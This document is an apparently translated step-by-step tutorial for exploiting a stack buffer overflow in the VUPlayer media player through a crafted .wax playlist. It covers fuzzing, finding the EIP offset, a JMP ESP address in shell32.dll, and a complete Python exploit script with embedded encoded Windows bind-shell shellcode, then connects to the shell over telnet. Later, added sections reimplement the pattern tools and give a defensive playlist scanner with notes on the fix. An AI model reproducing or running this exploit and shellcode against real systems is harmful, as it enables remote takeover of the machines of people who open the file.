OK, this time I want to try to exploit VUPlayer.
First step: patterns of attack.
This time I want to see whether it can be buffer-overflowed. In Notepad I type the character "a" a great many times; if the program crashes when it reads the file, we know it can be overflowed.
Once it is written, I save it in the WAX format as "spirit.wax", and I open spirit.wax with VUPlayer.
When I open it, VUPlayer crashes, which means it can be exploited.
Second step: make a fuzzer.
I try to make the fuzzer on BackTrack with a Python program.
#!/usr/bin/python
# Fuzzer: write a .wax playlist file filled with 100000 "A" characters
spirit = "spirit.wax"
smile = "A" * 100000
file = open(spirit,'w')   # 'w' so that running it again overwrites instead of appending
file.write(smile)
print("created successfully")
file.close()
Now we run it and we get the file spirit.wax.
Now open spirit.wax in VUPlayer and see whether it crashes; if it crashes on our fuzzer file, the fuzzer works.
When I press Open, VUPlayer crashes.
Third step: using pattern_create.
pattern_create makes a structured, non-repeating string of characters instead of plain A's, so we can tell which part of the input lands in a register.
To view the generated pattern, type: nano sprit.txt, and we see the structured characters. Now customize the fuzzer.
Change this line of the fuzzer
smile = "A" * 100000
to the result of pattern_create, inside quotes:
smile = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7-------"
(the pattern continues; it is much longer than shown here).
Now run it and we get the new file.
OK, now open OllyDbg, run VUPlayer from it, open spirit.wax and see how it crashes.
Fourth step: using pattern_offset.
Give pattern_offset the value found in EIP and the bytes found at ESP after the crash, and it tells us the offset of each inside the pattern.
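To show what pattern_create and pattern_offset actually compute, here is a small Python 3 reimplementation added as an example (it is not the Metasploit code and not part of the original post). It builds the same Aa0Aa1Aa2... cycle, converts a DWORD the way OllyDbg displays it (little-endian) back into the four pattern characters, and looks up their offset. The 1012 and 1016 offsets used in the test are the ones this post found; the pattern length and the crash values are constructed for illustration.

```python
import struct

# Alphabets cycled by pattern_create: uppercase slowest, digit fastest
UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"
MAX_LEN = len(UPPER) * len(LOWER) * len(DIGITS) * 3   # 20280 bytes before it would repeat


def pattern_create(length):
    """Build the non-repeating Aa0Aa1Aa2... pattern of the requested length."""
    if length > MAX_LEN:
        raise ValueError("pattern would repeat beyond %d bytes" % MAX_LEN)
    chunks = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                chunks.append(u + l + d)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def register_value(raw):
    """Interpret 4 bytes from the file as the debugger shows them: a little-endian DWORD.
    This is why "\\xAA\\xBB\\xCC\\xDD" in the file appears as DDCCBBAA in EIP."""
    return struct.unpack("<I", raw)[0]


def p32(addr):
    """Pack an address in the byte order it must have in the file to land in EIP."""
    return struct.pack("<I", addr)


def pattern_offset(value, pattern):
    """Offset inside pattern of the 4 bytes a register held after the crash.
    value may be the DWORD as OllyDbg prints it (int) or the raw 4 bytes."""
    if isinstance(value, int):
        value = p32(value)
    if isinstance(value, bytes):
        value = value.decode("ascii", errors="replace")
    return pattern.find(value)   # -1 when the value is not from the pattern


if __name__ == "__main__":
    # Constructed walk-through: pretend the crash put pattern bytes 1012..1015 into EIP
    pat = pattern_create(5000)
    eip = register_value(pat[1012:1016].encode())
    print("EIP=%08X -> offset %d" % (eip, pattern_offset(eip, pat)))
    print("bytes at ESP -> offset %d" % pattern_offset(pat[1016:1020], pat))
```

register_value and p32 are inverses: the DWORD OllyDbg shows is the file bytes read backwards, so the JMP ESP address 7C9D30EB has to be written into the file as "\xEB\x30\x9D\x7C".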
Fifth step: change the value of the EIP register.
customize the fuzzer:
remove smile="result of pattern_create"
add
smile="A" * 1012
smile+="\xAA\xBB\xCC\xDD"
(1012 is the EIP offset that pattern_offset gave us.)
Run it, open the file in OllyDbg and see that the EIP register was changed to DDCCBBAA (x86 is little-endian, so the four bytes show up reversed).
Sixth step: try writing to the ESP.
ESP is the stack pointer; the stack is the temporary data area in memory, and after the crash ESP points to our data 4 bytes past the EIP overwrite (offset 1016).
customize the fuzzer:
add
smile+="A" * (1016- len(smile))
smile+="\xCC" * (100000 - len(smile))
The first line pads up to the ESP offset found with pattern_offset; the second fills the rest of the file with 0xCC, so we can check in OllyDbg that ESP really points at our bytes (0xCC is also the INT3 breakpoint opcode, which matters once execution is redirected there).
Run it and open the file in OllyDbg.
Seventh step: JMP ESP.
Find the address of a JMP ESP instruction in the application's memory, then change the value written into EIP to the address of the JMP ESP that resides in shell32.dll.
OK, now we find the address of JMP ESP.
In OllyDbg choose View - Executable Modules; it opens the list of all executable modules.
Find the module SHELL32.dll and double-click it.
Now right-click in the module - Search for - Command,
and a command input window opens.
Type JMP ESP,
press Find, and we can see the address of JMP ESP. We find the address 7C9D30EB FFE4 JMP ESP.
OK, now
customize the fuzzer:
change this line (smile is the variable in our fuzzer)
smile+="\xAA\xBB\xCC\xDD"
to the address of JMP ESP, written in little-endian byte order:
smile+="\xEB\x30\x9D\x7C"
Run it and open the file in OllyDbg.
Last step: run msfweb.
Open a browser and type 127.0.0.1:55555 in the URL bar.
Select: payload.
In the filter module select: os :: win32.
Select: windows bind shell.
It will display the Windows bind shell form; fill it in.
Process on the DATA:
Restricted Characters: 0x00 0x0a 0x0d
Encoder: msf :: encoder :: shikata_ga_nai
Press "generate payload" and the shellcode will be shown.
customize the fuzzer (every piece after the padding is appended with +=, not assigned, or the earlier parts are lost):
#!/usr/bin/python
spirit = "spirit.wax"
smile = "A" * 1012                 # padding up to the EIP offset
smile+="\xEB\x30\x9D\x7C"          # address of JMP ESP in shell32.dll (7C9D30EB), little-endian
smile+="A" * 16                    # small pad in front of the shellcode
smile+=("\x29\xc9\xb1\x51\xdb\xd3\xbb\x1d\xf7\x7f\x2d\xd9\x74\x24\xf4\x5e"
"\x31\x5e\x13\x03\x5e\x13\x83\xf3\x0b\x9d\xd8\xf7\x9e\x89\x6e\xef"
"\xa6\xb1\x8e\x10\x38\xc5\x1d\xca\x9d\x52\x98\x2e\x55\x18\x26\x36"
"\x68\x0e\xa3\x89\x72\x5b\xeb\x35\x82\xb0\x5d\xbe\xb0\xcd\x5f\x2e"
"\x89\x11\xc6\x02\x6e\x51\x8d\x5d\xae\x98\x63\x60\xf2\xf6\x88\x59"
"\xa6\x2c\x59\xe8\xa3\xa6\xc6\x36\x2d\x52\x9e\xbd\x21\xef\xd4\x9e"
"\x25\xee\x01\x23\x7a\x7b\x5c\x4f\xa6\x67\x3e\x4c\x97\x4c\xa4\xd9"
"\x9b\x42\xae\x9d\x17\x28\xc0\x01\x85\xa5\x61\x31\x8b\xd1\xef\x0f"
"\x3d\xce\xa0\x70\x97\x68\x12\xe8\x70\x46\xa6\x9c\xf7\xdb\xf4\x03"
"\xac\xe4\x29\xd3\x87\xf6\x36\x18\x48\xf6\x11\x01\xe1\xed\xf8\x3c"
"\x1c\xe5\x06\x6b\xb5\xf4\xf9\x43\x21\x20\x0c\x96\x1f\x85\xf0\x8e"
"\x33\x79\x5c\x7d\xe7\x3e\x31\xc2\x54\x3e\x65\xa2\x32\xd1\xda\x4c"
"\x90\x58\x03\x05\x7e\xff\xde\x55\xb8\xa8\x21\x43\x2c\x47\x8f\x3e"
"\x4e\xb7\x47\x64\x1d\x16\x71\x33\xa1\xb1\xd2\xee\xa2\xee\xbd\xf5"
"\x14\x89\x77\xa2\x59\x43\xd7\x18\xf2\x39\x27\x70\x69\xa9\x30\x09"
"\x48\x53\xe8\x16\x82\xf1\xe9\x38\x4d\x90\x71\xde\xfa\x07\x17\x97"
"\x1e\xad\xb7\xfe\xc9\xfe\xb1\xe7\x60\xbb\x48\x05\x45\x83\xb8\x63"
"\x58\x41\x12\x8d\xe7\x6a\xff\xfc\x92\x4a\x54\x55\xc9\xc3\xd8\x57"
"\xbd\x02\xe2\xd2\x86\xd5\xca\x47\x50\x78\xa2\x26\x0f\x16\x45\x99"
"\xfe\xb3\x14\xe6\xd1\x54\x3a\xc1\xd7\x6a\x17\x0e\x01\x18\x67\x0f"
"\x99\x22\x47\x64\xb1\x20\xeb\xbe\x5a\x26\x3a\x6c\x5c\x08\xab\xee"
"\x7a\x4b\x5f\x5d\x84\x5a\x5f\xb1")   # bind shell payload generated by msfweb
file = open(spirit,'w')            # overwrite the previous spirit.wax
file.write(smile)
print("created successfully")
file.close()
Run it and open the file with VUPlayer, this time without OllyDbg.
OK, now open a console and type
root@bt:~# telnet 192.168.43.2 4444
press Enter and see what happens.
We can exploit it.
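From the defender's side, a file like spirit.wax is easy to spot before a player ever opens it. The Python 3 checker below is added here as an example (it is not part of the original post and not VUPlayer's code): it scans a text playlist and flags entries that are far longer than any real path or URL, that contain non-printable bytes, or that consist mostly of one repeated byte. The thresholds and the sample playlist contents are constructed for illustration. Note that the restricted characters given to the encoder above (0x00, 0x0a, 0x0d) are exactly the bytes that would terminate a C string or a line, so a working file of this kind always sits on one very long line; the scanner therefore keys on length and byte class rather than on those bytes.

```python
import sys

# Bytes a playlist entry may legitimately contain: printable ASCII plus tab
PRINTABLE = set(range(0x20, 0x7F)) | {0x09}

# Constructed sample inputs (not taken from the original post)
BENIGN = b"http://example.invalid/stream.mp3\r\nC:\\music\\track01.mp3\r\n"
SUSPECT = b"A" * 1500 + b"\xEB\x30\x9D\x7C" + b"\xCC" * 8 + b"\r\n"


def longest_run(line):
    """Length of the longest run of one repeated byte in line (0 for empty)."""
    best = run = 0
    prev = None
    for b in line:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def scan_playlist(data, max_len=512, filler_run=256):
    """Return [(line_no, [reasons...])] for every playlist entry that looks unsafe.

    max_len: longest entry a real path/URL is expected to need (assumed threshold).
    filler_run: run length of one byte that only padding produces (assumed threshold).
    """
    findings = []
    for no, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")
        if not line:
            continue
        reasons = []
        if len(line) > max_len:
            reasons.append("oversized entry")
        if any(b not in PRINTABLE for b in line):
            reasons.append("non-printable bytes")
        if longest_run(line) >= filler_run:
            reasons.append("repeated filler")
        if reasons:
            findings.append((no, reasons))
    return findings


if __name__ == "__main__":
    # Usage: python scan_playlist.py spirit.wax   (exit status 1 when something is flagged)
    with open(sys.argv[1], "rb") as fh:
        hits = scan_playlist(fh.read())
    for no, reasons in hits:
        print("line %d: %s" % (no, ", ".join(reasons)))
    sys.exit(1 if hits else 0)
```

This is a triage control for files arriving by mail or download, not a fix. The actual defect is the player copying a playlist entry into a fixed-size stack buffer without checking its length, and the fix belongs in that copy (a bounded copy and rejecting over-long entries); DEP and ASLR additionally make a fixed module address like the one used above unreliable across Windows builds.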
@keep smile & spirit
have fun